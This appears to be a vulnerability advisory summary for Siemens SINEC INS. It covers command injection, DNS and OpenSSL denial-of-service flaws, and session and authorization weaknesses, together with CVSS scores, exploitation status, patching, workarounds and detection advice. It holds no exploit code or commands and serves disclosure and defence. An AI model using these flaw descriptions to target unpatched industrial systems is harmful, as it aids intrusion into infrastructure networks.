Full Report
SINEC INS before V1.0 SP2 Update 3 is affected by multiple vulnerabilities. Siemens has released a new version for SINEC INS and recommends to update to the latest version.
Analysis Summary
# Vulnerability: Multiple Vulnerabilities in SINEC INS
## CVE Details
The advisory covers several vulnerabilities. High-impact identifiers include:
- **CVE-2024-46890**: CVSS 9.4 (Critical) - CWE-78 (OS Command Injection)
- **CVE-2023-50387**: CVSS 7.5 (High) - CWE-674 (KeyTrap DNSSEC DoS)
- **CVE-2023-5679 / CVE-2023-5680**: CVSS 7.5 (High) - CWE-617 (BIND Assertion Failure)
- **CVE-2024-46894**: CVSS 6.3 (Medium) - CWE-200 (Broken Authorization)
- **CVE-2024-46891**: CVSS 5.3 (Medium) - CWE-400 (Resource Exhaustion)
- **CVE-2023-5678**: CVSS 5.3 (Medium) - CWE-754 (OpenSSL DH DoS)
- **CVE-2024-46892**: CVSS 4.9 (Medium) - CWE-613 (Insufficient Session Expiration)
## Affected Systems
- **Products**: SINEC INS (Infrastructure Network Services)
- **Versions**: All versions prior to V1.0 SP2 Update 3
- **Configurations**: Specific services like BIND (DNS), OpenSSL, and the web-based management interface are vulnerable.
## Vulnerability Description
SINEC INS is affected by multiple flaws originating from both its core management API and integrated third-party components (OpenSSL and BIND):
1. **OS Command Injection (CVE-2024-46890)**: A high-privileged user can inject arbitrary operating system commands via the web interface.
2. **DNS Vulnerabilities**: Includes "KeyTrap," where malicious DNSSEC responses cause extreme CPU consumption, and assertion failures in BIND when DNS64 and "serve-stale" are enabled.
3. **Cryptographic DoS**: OpenSSL flaws related to excessively long Diffie-Hellman keys/parameters and state corruption on PowerPC architectures.
4. **Authorization/Session Issues**: Failure to invalidate sessions when users are disabled (CVE-2024-46892) and improper access control on the SFTP user API (CVE-2024-46894).
## Exploitation
- **Status**: PoC available for several CVEs (e.g., CVE-2023-5678, CVE-2024-46891, CVE-2024-46892, CVE-2024-46894). No active "in the wild" exploitation is currently confirmed by the vendor.
- **Complexity**: Low to Medium.
- **Attack Vector**: Network (most vulnerabilities are exploitable remotely over the network service ports).
## Impact
- **Confidentiality**: High (due to OS command injection and API authorization bypass).
- **Integrity**: High (command injection allows full system modification).
- **Availability**: High (multiple Denial of Service vectors in DNS and OpenSSL).
## Remediation
### Patches
Siemens recommends updating to the following version:
- **SINEC INS V1.0 SP2 Update 3** or later.
### Workarounds
- Limit access to the web management interface to trusted administrative networks only.
- Disable unused services within SINEC INS (e.g., SFTP or DNS) if not required for operations.
## Detection
- **Indicators of Compromise**: Monitor for unusual OS-level commands executed by the web server user. Check DNS logs for excessive resolution times or unexpected service restarts (crashes).
- **Detection Methods**: Utilize network intrusion detection systems (IDS) to identify "KeyTrap" DNS patterns or malformed OpenSSL handshakes.
## References
- Siemens Security Advisory SSA-915275: hxxps://cert-portal[.]siemens[.]com/productcert/pdf/ssa-915275[.]pdf
- Siemens ProductCERT: hxxps://www[.]siemens[.]com/cert/advisories
- Terms of Use: hxxps://www[.]siemens[.]com/productcert/terms-of-use